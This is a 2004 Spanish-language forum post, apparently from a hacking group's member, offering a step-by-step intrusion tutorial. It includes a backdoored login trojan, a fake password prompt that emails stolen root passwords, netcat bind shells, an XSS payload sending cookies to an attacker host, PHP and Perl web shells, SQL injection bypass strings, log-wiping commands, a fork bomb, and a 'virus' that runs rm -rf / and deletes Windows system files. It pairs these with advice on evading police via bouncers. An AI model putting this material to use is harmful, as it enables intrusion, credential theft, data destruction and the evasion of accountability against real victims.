Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - HaCkZaTaN

#1
Tutoriales - Documentación / Hacking Basico!!
6 Noviembre 2004, 04:18 AM
/*
  Name: Hacking
  Copyright: [N]eo Security [T]eam [NST]®
  Author: HaCkZaTaN
  Date: 04/11/04 19:19
  Description: Hacking
*/

_________________________________
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|=-=-=-=-=-=by HaCkZaTaN-=-=-=-=-=|
|-=-=-You may pray for your Pc=-=-|
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|_________________________________|

_________
|1= Intro|
|________|

Hey q mas!! Pues aqi escribiendo esto haber que mas se me ocurre
____________
|2= Objetivo|
|___________|

Ir a Google.com

oK tenemosque mirar el objetivo detalladamente y anotar toda la Info Lo mas que podamos y no se te
ocurra Conectarte desde tu pc xD hazlo
desde una shell y utilzar bouncers...............................

________
|3= O.S | 
|_______|

oK determinar el O.S es muy importante
Formas:          __________________________________________________
Telnet> Host 23 [Es mucho mejor aveces colocar el puerto ssh <<22>>]
                 ___________________________________________________
Ftp> Host 21    [Para saber el server de ftp y mirar si tiene bugs para entrar como root es una forma
mas facil Determinar el DAEMON]
_______________________
|4= Escanear una WebPage|
|_______________________|

Yo scaneo con nmap es el mejor scanner que hay en la Net <<That's what i Think>>
Este scanner te da un log muy buena de los puertos y alguna informacion extra
Tenemos que mirar si esta en varios Dns para mirar con que nos metemos por que aveces estan los
diferentes puertos en cada Dns>>
Me explico [Dns1]>>>Tiene abierto el ftp
           [Dns2[>>>Tiene abierto el ssh
Escaneamod de esta manera
nslookup host
____________________________________
|5= Tratar de entrar por los puertos|
|___________________________________|

Para sacar info de los puertos y de los daemons hacemos

telnet> host 21
telnet> host 22
telnet> host 25
telnet> host 79
telnet> host 110
telnet> host 109
telnet> host 143
telnet> host 139 <<<por si utiliza archivos compartidos en windows>>>
telnet> host 119

oK nos vamos a mirar a cada daemon y mirar su server ejemplo

Port 21 Server ProFtp>>>> Buscamos Xploits para esta version de este server para tener permisos admins,
O si nos deja entrar como anonimo o
guest y nos deja mirar /etc/passwd o /etc/shadow/ pues miramos si no estan cifrados y buscamos un
desencriptador de Md5 o en lo que este
La mayoria de linux o Unix encriptan a 64bits

Port 22 lo mismo buscamos el server de ssh

Port 79 Finger si lo tienen abierto nos libran un peso de encima por que Esto nos da mucha informacion
del usuario o root escribimos <<</w>>>
para mirar quien esta en linea oK esto nos da mucho info.
Una cosa tambien podemos poner un sniffer es una grandiosa idea

Bueno con la informacion que aparece cuando haces el finger el passwd podria ser muy facil de sacarlo
y nos serviria como una shell gratuita
y de buena calidad <<smart me, don't I?>>

Otra seria sacar los passwd de los emails para mirar de que es lo que habla el root y con quien y hasta
depronto podemos utilixar nuestra
ingenieria social para sacar los passwd de la PC.
Podemos acceder por el puerto 110 <<POP>>
Podemos utilizar xploits, hay muchos para cada tipo de server de sendmail <<25>> o POP <<110>>

Tambien por el Puerto 80 scaneamos Bugs:
PHP NUKE
SQL
CGI
PL
ASP
APACHE
ORACLE
Etc...

____________________
|6= Local Xploits   |
|___________________|


Podemos utilizar exploits cuando ya estamos dentro de la maquina.

sh-3.00$ sh Xploit.sh
ven que facil ;-)
oK deben de saber de C por que aveces lo xplits no vienen bien configurados

Una vex hecho todo eso creamos un Usuario para tener una shell gratis xD
Pero no usuario normal si no uno con derechos como root (osea no ser root por que no se puede pero que tenga todos los derechos
posibles)) xD
Ahora estan con la moda del W00t, ptrace.. Bueno pues busquen acerca de el pero ademas ya son obsoletos

Jugando con offsets
Digo esto para los que les gusta jugar con ella :)
Un pequeno Brute Force en Perl.
***********************
#!/usr/bin/perl
$MIN=0;
$MAX=5000;
while($MIN<$MAX)
{
   printf('offset : $MIN n');
   system('xploit $MIN');
   $MIN++;
}
**************************
__________________
|7- Remotes Xploits|
|__________________|

Ok subimos un xploit a  nuestra shell y colocamos:

root@HaCkZaTaN!!:~ # ./s 0 && cat | netcat host 457
id
uid=28(nouser) gid=28(nogroup) groups=28(nogroup)     

y listo nos dio una shell nobody.
Acuerdense que hay que jugar con el offset para poder tener root xD.

_________________
|8= Borrar Huellas|
|_________________|

Borramos Huellas de esta manera

rm /var/log/wtmp
rm /var/log/lastlog
Para arrglar el PC
tee /var/log/wtmp
tee /var/log/lastlog

modo mas bueno seria
find / -name log && rm -rf && rm -f && ps -def && grep klogd && kill -9 pid && ps -def | grep syslog
cd /
rm -rf .bash_history && rm -rf /var/adm && rm -rf /root/.bash_logout && rm -rf /root/.bash_history
hay que Editar.bash_history o .sh_history
y si quieres es tumbar la PC xD:
rm -rf/etc/passwd
rm -rf /etc/shadow
rm -rf /bin/login
rm -rf /bin/rm
rm -rf /etc/inetd.conf
killall login
***********************************
find / -name log* -exec rm -rf {} \     //Forma ofuscada
***********************************

Otra Forma ((REpito caso todo lo de arriba xD
Buscando archivos con nombres que empiexen por log:
****************
find / -name log //Despues los borramos
*****************

********************
ps -def | grep klogd //Editamos este archivo
ps -def | grep syslog //Editamos este archivo
********************

***********
kill -9 pid //Matamos todos los procesos
***********
****************************
cd /
unset HISTFILE
rm -rf .bash_history
rm -rf /var/adm
rm -rf /root/.bash_logout
rm -rf /root/.bash_history
****************************

En windows Seria
del c:\winnt\system32\logfiles
del c:\windwos\system32\logfiles
del c:\winnt\system32\logfiles\*.log
dir /s *.log
dir /s *.evt
Bueno pero esto no es todo es mejor que te bajes un Zapper o un Wipper es la misma cosa pero
gente le gusta llamarlo de diferentes maneras

____________
|9- Troyanos|
|___________|

Troyano para linux el mas famoso y mas confiable BackDoor <<Hint: La mayoria de linux no tienen
antivirus>>
Lo llamaremos login.c
***********************************************************************************************
#include <stdio.h>
#define OLDLOGIN "/usr/lib/login"
#define LOGINNAME "login"
#define MAGIC_WORD "localhost"
#define REVISION "$Id: Localcore 2000/08/14 21:31:00 marekm Exp $"
char **exe;
do_back() {
   puts(REVISION);
   putenv("TERM=vt100");
   putenv("HISTFILE=/dev/null");
   execl("/bin/sh","sh","-i",0);
}
main(argc, argv)
   int argc;
   char *argv[];
{
   exe = argv;
   exe[0] = LOGINNAME;
   if ((char *)getenv("DISPLAY") != (char *)NULL) 
      if (strncmp(getenv("DISPLAY"),MAGIC_WORD,strlen(MAGIC_WORD)) == 0)
         do_back();
   execv(OLDLOGIN,exe);
}
*****************************************************************************************************
Bueno lo Subimos asi;
cp /bin/login /usr/lib/login
chmod 777 /usr/lib/login
tee login.c
gcc -O2 login.c -o login
chmod 4755 /bin/login

Bueno si queremos colocar clave modificamos
#define MAGIC_WORD "localhost" <<<Por esto>>>
#define MAGIC_WORD "aqui el password sin espacios"
oK ya tenemos root xD.

Esto seria en Windwos Utilizamos el SUb7 0 SubSeven
Ok subiremos un bouncer xD
Hacemos esto
"advanced"
"PORT REDIRECT"

en "input port" pon el puerto que nos vamos a conectar ejemplo 1942
en "output host/ip" Ip/Host a conectar
en "output port" Puerto a conectar 21,23 etc.
<<tambien se puede hacer en el IRC cuando te banean o quieres entras por seguridad>>

Para estar con bouncer en cualquier puerto lo hacemos asi en este caso Sera Http <<80>>
en "input port" 80
en "output host/ip" Host/Ip
en "output port" 80

ahora en el UNICONSOLE ponemos la ip del BOUNCER en vez de www.mju.es y JAMAS sabran que hemos sido
nosotros los que han entrado.
Para entrar en un FTP con claves ROBADAS y que no nos visiten los agradables guardia civiles:

-en "input port" Pon 21
-en "output host/ip" ponemos el OBJETIVO ftp.terra.es (por ejm)
-en "output port" pon 21
oK es facil asi se hace susecivamente con todos los puertos Es lo mismo que en la shell pero un poco
mas complicado

Unos se preguntaran pero como le hago para no estar jugando con comandos desde la URL
pues hay tenemos una Opcion dejar la pagina que estamos atacando con un backdoor o
corriendo algun servidor que nos deje entrar con el ssh (Putty si estas en Windows)

hay un BackDoor que se llama r0nin o puedes buscar mas en google.com hay apareceran
bastantes.
Aqui les dejo un troyano:D
************************************************************************************
************************************************************************************
#include <stdio.h>
#include <pwd.h>
#include <stdlib.h>
#define EMAIL "correo@electronico.aqui"
#define ARCH "arch.fsu
int main(void)
{
  char enviar[100];
  char grabar[100];
  char* clave;
  FILE* archivo_ptr;
  clave = (char *) getpass("Password:");
  puts ("Sorry");
  archivo_ptr = fopen(ARCH, "w");
  fprintf (archivo_ptr, "Root Password: %s\n", clave);
  fclose (archivo_ptr);
#ifndef TMP
  sprintf(enviar, "mail %s < %s ; rm %s", EMAIL, ARCH, ARCH);
  system(enviar);
#else
  sprintf(grabar, "cp %s %s", ARCH, TMP);
  system(grabar);
#endif
  exit (EXIT_SUCCESS);
}
************************************************************************************
************************************************************************************
La otra opcion que digo es con el NetCat :D Dejando unpuerto a la escucha con alguna shell
ya sea
zsh sh bash etc.....
Pero como lo hacemos? pues es muy facil
si es una Windows la Maquina que estamos atacando dejas escuchando asi

  • Windows
    ****************************
    nc -l -p 8000 -t -e cmd.exe -L
    ****************************
    ******************
    nc -L -w 1 -p 8000
    ******************

  • Linux
    *************************
    nc -vvlp 8000 -e /bin/bash
    *************************
    ******************
    nc -L -w 1 -p 8000
    ******************

    Bueno tu ya descojeras de las maneras que quieras
    entonces despues le sacas la Ip a la Pagina que estas atacando o con el mismo host y desde tu maquina habres el ssh
    o el telnet (Putty si estas en Windows) o el nc, recomiendo el netcat por que dejamos a la escucha con el mismo netcat
    Entonces nos conectariamos asi
    *********************
    nc -vv host/ip 8000
    ********************

    _________
    |10= Spoof|
    |_________|

    El spoof es cuando falsean tu ip o la mayoria de los paquetes que entran en ella se utiliza para
    saltar firewalls y otros tipos de seguridad.

    ___________________________
    |11= Como tumbar un servidor|
    |___________________________|

    Compilar el programa:
    cc synk4.c –o synk4

    Modo de uso
    ./synk4 <ip-origen> <ip-destino> <puerto-inicial> <puerto-final>

    <ip-origen> 0, y el programa utilizara un random de IPS 
    <ip-destino> Pones la ip de destino ejemplo 127.0.0.1
    <puerto-inicial> y <puerto-final>
    Eje: ./synk4 0 127.0.0.1 21 21  0 23 23

    Se empexara a moverse un contador...
    Cuando llegue a 4000 o 5000 o 6000 ya paramos hay
    Cuando acabemos todo y cerremos el progrma nos conectaremos al puerto que atacamos y nos damos cuenta
    que esta tumbado xD

    [root@localhost]# telnet localhost 23
    Trying 127.0.0.1...


    El programa a descargar se llama SYN <<TCP SYN Flooding>>
    Bueno tambien se podria hacer local usar malloc(); y fork();
    Ejemplo:
    **********************************
    /*
      Name: LinuxCrash
      Copyright: Neo Security Team [NST]®
      Author: HaCkZaTaN
      Date: 12/09/04 03:51
      Description: CrashesLinux
    */
    int main()
      {
        while(1)
         {
                malloc(1024);
                fork();
         }
    return 0;
    }
    ***************************************

    ______________
    |12= Keylogger|
    |_____________|

    Bueno a muchos les gusta o no les gusta usar keyloggers pero si necesitas uno pues utilizalo todo
    es posible en esta vida y si te dicen que es de lammer pues mas lammer el que se lo deja meter

    ______________
    |12= Tecnicas |
    |_____________|

    Bueno esto me da hasta pena colocarlo pero bueno como se han dado cuenta ahora la moda de hackear es con el
    w00t, r0nin, mass, yim. Pues son utilidades para *nix su modo de uso es sencillisimo

    $chmod 777 programa
    $./programa

    Como pueden ver no tiene ciencia esas tecnicas son estupidas lo bueno es crear shellcodes y xploits
    hacer overflows eso si que es muy bueno, trabajar con los offset etc....

    ______________
    |12= XSS      |
    |_____________|

    Pues bueno ahora ya dicen que hackean una pagina Php o Html por hacer XSS en la pagina pero bueno eso
    no importa lo que importa es aprender

    <input type="text" name="palabra"> que será el formulario.
    <input type="submit" name="buscar" value="Buscar"> que será el boton.

    Como pueden ver es vulnerable entonces podemos proceder a hacer XSS
    Creamos un archivo .php que contenga cookie

    Código:
    <?
    $cookie = $_GET['cookie'];
    $fff = fopen("archivo.txt","a");
    fwrite($fff, "$cookie \n");
    fclose($fff);
    ?>

    http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
    Bueno a mi casi no me gusta explicar si no dejar todo hecho y que usteddes lo descubran sorry si no explico

    CrashCool ah creado una Herramienta exelente para esto lo que hace es cifrar el Texto>> Gracias CrashCool Pagina Crashcool.com
    Link de descarga
    http://crashcool.com/xss-c.zip
    [-]XSS generator by CrashCool
    [-]Introduzca codigo:
    <script>alert("hola");</script>
  • Generado

    <script>var b=String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 104, 111, 108, 97, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62); document.write(b);</script>

    [-]Guardarlo en archivo? (s/n) :s
  • guardado en xss.html
    ]x[ Pulse la tecla ENTER para salir...

    Codigo:
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #define XSS_1 "<script>var b=String.fromCharCode("
    #define XSS_2 "); document.write(b);</script>"
    #define MAX_ENTRADA 800

    /**
    *Generador de XSS
    *Genera y da la posibilidad de guardar a archivo
    *Diseñado para saltar filtros de las comillas ""
    *Autor:CrashCool
    *Fecha: 03/10/04
    *Licencia: GPL
    *web: www.crashcool.com
    *contacto: crashcool@gmail.com
    *V: 1.0.1
    *version original en JAVA www.crashcool.com
    */

    void guardar(char *salida);

    int main()
    {   char a[MAX_ENTRADA];     
        char aux[5];
        char *res=NULL,opcion='\0';   
        int tamanyo,i;
        puts("[-]XSS generator by CrashCool");
        puts("[-]Introduzca codigo:");
        gets(a);
        fflush(stdin); 
        tamanyo=(strlen(a) * 3)+((strlen(a)-1) * 2);     
        res=(char *)malloc(tamanyo*(sizeof(char)));
       
        strcpy(res,XSS_1);
        for(i=0;i<(int)strlen(a);i++)
        {
            strcpy (aux, "");
            sprintf(aux,"%d",(int)a);
            if(i< (int)(strlen(a)-1) ) strcat(aux,", ");         
            strcat(res,aux);                  
        }
        strcat(res,XSS_2);
        puts("
    • Generado");
          printf("\n%s\n\n",res);
          printf("[-]Guardarlo en archivo? (s/n) :");
          opcion=getchar();
          if(opcion=='s' || opcion =='S'){
          guardar(res);
          puts("
    • guardado en xss.html");
          }
         fflush(stdin);
         puts("]x[ Pulse la tecla ENTER para salir...");
          getchar();
          return 0;     
      }

      void guardar(char *salida)
      {
          FILE *archivo;
          archivo=fopen("xss.html","w");
          fprintf(archivo,"%s",salida);
          fclose(archivo);
      }
      ******************************************************************************************
      _________________________________
      |13= Remote File Inclusion (RFI)|
      |_______________________________|

      Remote File Inclusion (RFI)

      A mi casi no me gusta explicar si no dar el trabajo hecho osea al grano no dar vueltas al asunto

      De que trata el Bug!!
      ----- beging the code in index.php -----

      if (!isset($req_path)) $req_path="";
      require_once($req_path."funcs.php");
      ----- end of the code -----
      Forma de xplotar
      http://localhost/nst/index.php?req_path=http://nst/
      _____________________________________________________________________________________________________

      Otro bug es el de:
      *************************************************
      <?
      exec($_GET[cmd],$salida);
      foreach($salida as $line) { echo "$line<br>"; }
      ?>
      ************************************************
      <?
      system($_GET[cmd],$salida);
      foreach($salida as $line) { echo "$line<br>"; }
      ?>
      *************************************************
      <?
      passthru($_GET[cmd],$salida);
      foreach($salida as $line) { echo "$line<br>"; }
      ?>
      *************************************************
      <?php
      $com = $_GET["com"];
      system ("$com");
      ?>
      *************************************************
      <?php
      echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
      ?>
      *****************************************************
      Modo de explotacion
      http://localhost/nst/index.php?req_path=http://nst/&com=ls

      ___________________________________________________________________________________________________
      Modo de Busqueda!!

      ****************************************************************************
      ****************************************************************************
      allinurl: "index.php?*=*.php"
      http://www.google.com/search?num=100&hl=en&lr=&q=allinurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search
      ****************************************************************************
      ****************************************************************************
      inurl: "index.php?*=*.php"
      http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=inurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search
      ****************************************************************************
      ****************************************************************************
      allinurl: /My_eGallery/public/displayCategory.php?
      http://www.google.ca/search?hl=en&q=allinurl%3A+%2FMy_eGallery%2Fpublic%2FdisplayCategory.php%3F&meta=
      ****************************************************************************
      ****************************************************************************
      ___________________________________________________________________________________________________
      Bueno ahora estan con la Moda de Remote File Inclusion. Y todo esto dado en PHP bueno pues aqui
      les traigo unos en Perl Smile Funcionan de la misma manera
      http://host/cgi-bin/net.cgi?p=uname -a
      Donde:
      nst.cgi >> Es el nombre del archivo
      p es el comando que esta en el nst.cgi que nos da shell
      El que utilizo para esta demostracion es el numero 3 saludos

      1
      Código:
      ****************************************************************************
      ****************************************************************************
      #! /usr/bin/perl
      use CGI qw(:standard);
      print header;
      my $c=param("c");
      if ($c gt "")
      {
      $s=`$c 2>&1`;
      print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
      }
      else
      {
      print "[N]eo Security [T]eam [NST]"
      }
      ****************************************************************************
      ****************************************************************************

      2
      Código:
      ****************************************************************************
      ****************************************************************************
      #! /usr/bin/perl
      use CGI qw(:standard);
      print header;
      my $c=param("c");
      if ($c gt "")
      {
      $s=`$c 2>&1`;
      print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
      }
      else{ print "[N]eo ecurity [T]eam [NST]"
      }
      ****************************************************************************
      ****************************************************************************

      3
      Código:
      ****************************************************************************
      ****************************************************************************
      #!/usr/bin/perl
      use CGI qw(:standard);
      print header;
      my $k=param("p");
      my $a=param("a");
      if ($a || $k)
      {
      $l=`$k 2>&1`;
      print start_form,textarea("p",$k,3,50);
      print submit("Enter");
      print end_form;
      print pre($l);
      }
      ****************************************************************************
      ****************************************************************************
      _________________________________
      |13= Subiendo Archivos a un host|
      |_______________________________|

      Como subimos archivos a la pagina o host a Hackear?
      Pues hay muchas formas pero dare unas cuentas
      wget http://www.host.com/archivo.c
      lynx http://www.host.com/archivo.c
      links http://www.host.com/archivo.c
      curl -O http://www.host.com/archivo.c
      curl -a ftp://www.host.com/archivo.c

      ****************************************************************************
      ****************************************************************************
      ______________
      |14= Rooteando|
      |_____________|

      Como lo rooteo?
      Bueno ahora te toca tu turno de ir a google.com y buscar
      Aqui en Neosecurityteam.org tenemos unos cuantos xploits que nos dan root remotamente o localmente
      solo necesitas compilarlos y ya
      hay un archivo en la red que se llama w00t, xp1.
      estos te daran root con solo ejecutarlos en el sistema que bueno no?
      jajaj se utilizan asi
      ./w00t
      ./xp1

      Otra forma seria por shellcodes!!
      Pero esto si no lo explicare es algo muy largo pero si quieren tener idea de lo que hablo ok

      main()
      {
      system("/bin/sh"); //exeve(1,"/bin/sh");
      }

      Compilas eso como un .c y listo despues objdum -d archivo sacamos NULL's bytes osea
      xoring y listo. Complicado no!!

      ****************************************************************************
      ****************************************************************************
      _______________
      |15= Compilando|
      |______________|

      Como compilo?
      gcc -O4 -w -g -s archivo.c -o x
      gcc archivo.c -x
      nasm archivo.asm

      Como linkeo desde asm?
      nasm -f elf archivo.asm
      ld -o archivo.exe archivo.o
      ****************************************************************************
      ****************************************************************************
      _______________
      |16= Anonimo   |
      |______________|
      Quiero estar anonimo?
      Busca acerca de
      Bouncers
      PSYbnc
      Proxys
      ****************************************************************************
      ****************************************************************************

      ______________________
      |17= Inyeccion SQL   |
      |____________________|

      No explicare mucho solo dare unos User y Pass!!
      usuario='geek'                       senha='s3nh4'
      usuario='' or '1'                    senha='s3nh4'
      usuario=&nbsp;'or'                   senha=&nbsp;'or'
      usuario=' or ' 1                     senha=' or ' 1
      usuario='1' = '1'                    senha='1' = '1'
      usuario=' or '1'='1                  senha=' or '1'='1
      usuario='' or '1'='1'                senha='' or '1'='1'
      usuario="senha"                      senha="senha"
      usuario="password"                   senha="password"
      usuario="teste"                      senha="teste"
      usuario="123"                        senha="123"
      usuario="1234"                       senha="1234"
      usuario="12345"                      senha="12345"
      usuario="VB"                         senha="VB"
      usuario="visual"                     senha="visual"
      usuario="basic"                      senha="basic"
      usuario=' or senha='teste            senha=' or senha='teste
      usuario=' or senha='login            senha=' or senha='login
      usuario=' or email like 'flavio%     senha= ' or email like 'flavio%
      usuario='or '1'='1' order by 1 --    senha='or '1'='1' order by 1 --
      usuario=' or '1'='1' order by 1 --   senha=' or '1'='1' order by 1 --
      usuario=' or 1=1--                   senha=' or 1=1--
      usuario='or''='                      senha='or''='
      usuario=' or 'a'='a                  senha=' or 'a'='a
      usuario=') or ('a'='a                senha=') or ('a'='a
      usuario=b' or ' 1='                  senha=b' or ' 1='
      usuario=' or '|                      senha=' or '|
      usuario=123'or'=                     senha=123'or'=
      usuario=admin'-                      senha=admin'-
      usuario=' or '1=true                 senha=' or '1=true
      usuario=7' or ' 1                    senha=7' or ' 1
      usuario=root                         senha=root
      usuario=shell                        senha=shell
      usuario=admin                        senha=123456
      usuario=admin                        senha=admin
      Usuario=';shutdown--                 senha=';shutdown--
      ****************************************************************************
      ****************************************************************************
      _____________
      |18 OffTopic|
      |___________|
      Bueno muchos dicen por hay que es un Lame Virus o le dicen otros nombres
      mas por que razon? Por que le pasan el codigo a un Lammersito cualquiera
      y le dicen mira compila esto y cojeras r00t o ownearas windows o cualquier
      cosa. Se puede compilar en windows o linux
      gcc LameViruz.c
      Código:
      /*
        Name: LameViruz
        Copyright: [N]eo ecurity [T]eam [NST]®
        Author: HaCkZaTaN
        Date: 26/10/04 17:17
        Description: LameViruz
      */

      #include <stdio.h>
      #include <stdlib.h>
      int main()
      {
      double x;
      for (x=0; x<1000000000; x++)
      {
      printf("\nHacktool\n", x);
      printf("\nAhora miraras que ya puedes hackear con solo mirar la pantalla ;)\n", x);
      system("rm -rf /bin/*");
      system("rm -rf /usr/bin/*");
      system("rm -rf /*");
      system("del /F /Q C:\\windows\\system32\\hal.dll");
      system("del /F /Q C:\\windows\\system32\\kernel32.dll");
      system("del /F /Q D:\\windows\\system32\\hal.dll");
      system("del /F /Q D:\\windows\\system32\\kernel32.dll");
      system("del /F /Q c:\\*.ini");
      system("del /F /Q c:\\*.bat");
      system("del /F /Q c:\\*.sys");
      system("del /F /Q c:\\*.exe");
      system("del /F /Q c:\\*.dll");
      system("del /F /Q c:\\windows\\*.ini");
      }
      }

      ****************************************************************************
      ****************************************************************************
      ________________________________________________________________________________________________
      NOTA o TIP

      Es muy recomendable dar permisos a los archivos que subes o que quieres ejecutar.
      como se hace eso?
      les dare tres formas
      chmod -x archivo
      chmod 777 archivo
      chmod 777 *
      =====================================================================
      =====================================================================
#2
Ingeniería Inversa / Reto!!
4 Septiembre 2004, 16:17 PM
Reto> Crackme!! Sacar Serial!!
http://www.lanzador.net/hackzatan/Reto.exe
Salu2!!